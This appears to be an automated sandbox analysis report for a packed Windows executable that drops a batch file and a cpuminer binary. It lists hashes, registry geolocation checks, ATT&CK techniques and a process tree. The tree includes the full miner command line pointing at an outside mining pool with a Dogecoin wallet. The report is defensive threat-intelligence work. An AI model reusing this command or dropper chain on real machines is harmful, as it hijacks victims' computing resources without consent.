73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
22/02/2024, 06:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
544	b2e.exe
1900	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1900	cpuminer-sse2.exe
1900	cpuminer-sse2.exe
1900	cpuminer-sse2.exe
1900	cpuminer-sse2.exe
1900	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3224-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3224 wrote to memory of 544	3224	batexe.exe	88
PID 3224 wrote to memory of 544	3224	batexe.exe	88
PID 3224 wrote to memory of 544	3224	batexe.exe	88
PID 544 wrote to memory of 404	544	b2e.exe	89
PID 544 wrote to memory of 404	544	b2e.exe	89
PID 544 wrote to memory of 404	544	b2e.exe	89
PID 404 wrote to memory of 1900	404	cmd.exe	92
PID 404 wrote to memory of 1900	404	cmd.exe	92

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3224
- C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6179.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:404
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1900

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe

Filesize
8.6MB

MD5
23872a792c52df135cd83fb8f3acb4bb

SHA1
b7deecce2d4f16c75dd6afa536c26df09085cfd8

SHA256
a0fe2e0899d0a060bd1c209e3e3b99362898121e51cc66ae1b2b20615a636ef7

SHA512
318710fc9604e2ae5987670a873b3c059e81f9d0891523cce44ea763d53a4d1c74ac185f30a769fc2e64593a229ddd77a99e0337ad49dc6083aeb0d40960ccc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe

Filesize
3.1MB

MD5
deee44db95d36a7e5603bb2842bc1feb

SHA1
344dafba4264d1ce896807e8fbedfc4e2a95c572

SHA256
076a07bd4efe9f65d0200974a4599836d9f7e0f4ce318b63ed7b05609904a8c7

SHA512
9de0311f332f2754d6e5e6024d9a8ebeaff0832a8902a100ef707f89575c2134567ccfb888cb6c3358eff9b61bbe5338066fd1dea20c1fe985046816409841ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E9B.tmp\b2e.exe

Filesize
2.5MB

MD5
66238d750098a56e9918197a0047cece

SHA1
d03fea25156827733475774e8970bee8e4bccaef

SHA256
fad47b08e4e7f2d4db43dd764fc16148aa15189a8d3ab1880bca7ffadbe991d4

SHA512
c8cd931a1155c65a8451a84de9555b50399a9015be5450082888a613f1ac4c5689d29ad76f1ae8d7d28e5addc0175fac4a15ff7fa7464c9fee51567886d27c88

Download Submit
C:\Users\Admin\AppData\Local\Temp\6179.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
120KB

MD5
eb5b07419efd06e9705a766970dcff5b

SHA1
0a53acf5bd7a1ab0e59aced8348b1d320969920b

SHA256
53b15b3395fa22dd47a971996218954f310878e586bd1528c5d2bf58e1210474

SHA512
823014bb6d36acbf8bdb06cb602b09a9be91facf4c8bc853920feaf7249701b8ecddc3b98e43c10bcd83f4d1d902243d79c4cdd9fd3ff976587fd062e5c11745

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
436KB

MD5
d3c2662ed82d39b0dd63457132b36c7a

SHA1
d6b80a2c71b8e21340603588a36aa05cafd6cf27

SHA256
a7ee2e311d7012375e8e636fdb64be714e6cabcb65eb1932e5f94e38b1dda54c

SHA512
89b6cf858b81c051d83aa70fe32ddb9cdbe84d7e18dd9b37a21863fa1acfecd4470b7e8689039c2be90ff6a1633d8aede61fc78a5dd2dcaba0af51f2293b9e05

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
286KB

MD5
42559a660c369a9a63aacf63ae56e943

SHA1
cc72fefb5f38011340d11901a7344fc8bbca86b5

SHA256
36bb983b1809e317f5f3dee6423258c19c1aa5aabc4055b0e1319bac5b72199c

SHA512
18d384eb4615776aa2977eaa6f5371e56bd84ca38fe69c57bc96e19398f902e708e79c2db1ca4c4859bec8bc2adb77325770541ee75176fb7f47c33a7f531f26

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
111KB

MD5
1e6fdb1d1f5157b310341a5274c8118c

SHA1
95345bbb344ab814f248b77558779794a008ca0a

SHA256
68e2c877600bd15d595bfc3def8c91dd42dd56d5356b408576fb68a12648992c

SHA512
979a11c82e08a0a453c04984e4f6b5d7958eac0ed5acc77f66aeed52e53ade90baa6325b230e3b46543e06a2bd45f4d020890f9189638f63826ee221976c2cca

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
368KB

MD5
91762ee4060e3baee5e35a0cfda8680b

SHA1
c751d84c985c40e782447bb130b485d75f27faf3

SHA256
0cbd554721f327f1f42bc4da3fa77670ec5a2f4e19ae6f5e821c3e8f2f59edc6

SHA512
6350828a357c1c7db4b8fc7390e207eb4bb1afa8a3254bb0c3e96862950cda78f5833239c622ec5e4a79f890bc2d210670498321119d61587ccf557827a9388c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
116KB

MD5
3effa5b5e52c20b1d3c04855f41dcc3f

SHA1
31d53c5018515c7ecd6f42d62338bc015aa96769

SHA256
de3ddb8229003f03e71fea96e4c36a72cd4114d8acc7023d584b8605d5b26bad

SHA512
5f12effd0dc239fca34c28b62e118445940929fe82445e9c1a0927a5fd64e6793d31a925927c864875687a1e609cd42f95a28f92566e2628caeaa4e5b43de8c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
218KB

MD5
cff8a26e3e72f785582fe61cce20d0a1

SHA1
90ad60d9d6893c34345431586b37075c9db6a5db

SHA256
7c82d2f6affe434e76b78a0f5e63af419fde811047ff0d4b738f13ece4aedf83

SHA512
f02ba8ace23eade77a84c65cc328eec517f46fab9302bdf82ca11a9bdf436502eb5974319450d1f1f71d30ceceeeb657d1f7881ac6a8364e66ab5909a52cf33d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
153KB

MD5
fe1bec8a50cce53ce8f072eed8b0d2f8

SHA1
5669690926a305397059f89cf50b5ed85e2cbb87

SHA256
becb8fb0b208e694cad5e6d00676e5d162f1c767f07e03ee0f7ef1ba1043e46a

SHA512
9745549471f8df8b162772dbdb3285cc16f6259bc4d9ba9e87b07184f0bca40feb6b93c2f1cb7e770d283d205029ac77c799bcb92956e495d42c1b9ceb288ef2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
174KB

MD5
05376837fb3d3de86ab876f13264feb9

SHA1
0e639822efeb82898a9fb53b5a7c8992782fcf0e

SHA256
1b03d5dd11973d7edbaae2e1e52f57ccd0cee9f3c090f4317cf477ba1d3a6a67

SHA512
d38e0e3640de72ca0476f90f117a63541467f211bb4f05467b28e6b70d0dba4c5f14332fffb4a9ed6f3c16f4155698f26c940232cf0b196a3723307b211e24e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
215KB

MD5
8366d787952276bbf9dea97a6fdcc702

SHA1
6a7236142e7fd05288596a3db157726c7c026e59

SHA256
01ab8fc9dd3ca874a920fc3e2d3e2788fd90b317e70677a9f41f43d5fd40d76f

SHA512
ad9afdc8b4ac7561d16a55b4a9bdca12b7c3ceebdf0bf9254d65ff7631e27119b771069ffe63204edfb9bb627b199ee96c4ff8977278187ffbf7fa209ccd19c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
253KB

MD5
e609204e559708f34f276d389b6cd881

SHA1
205612eda272ae2fff92d1152153cd6dc3e2853f

SHA256
fee0b1adcb5fba8caa51c96cdcbb60529a42f1997d2ede421c606c5e7893f7af

SHA512
6fc3dd785a48e535674c76a01e0b1f177bcfe30ccb560113e62db2ca9263b539673da356592be0ccec7593be6ebdd6982d78652ea4d270f7fd70cdf2a13b65c0

Download Submit
memory/544-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/544-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1900-46-0x000000005EB80000-0x000000005EC18000-memory.dmp

Filesize
608KB

Download
memory/1900-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1900-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1900-47-0x0000000001120000-0x00000000029D5000-memory.dmp

Filesize
24.7MB

Download
memory/1900-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1900-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3224-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download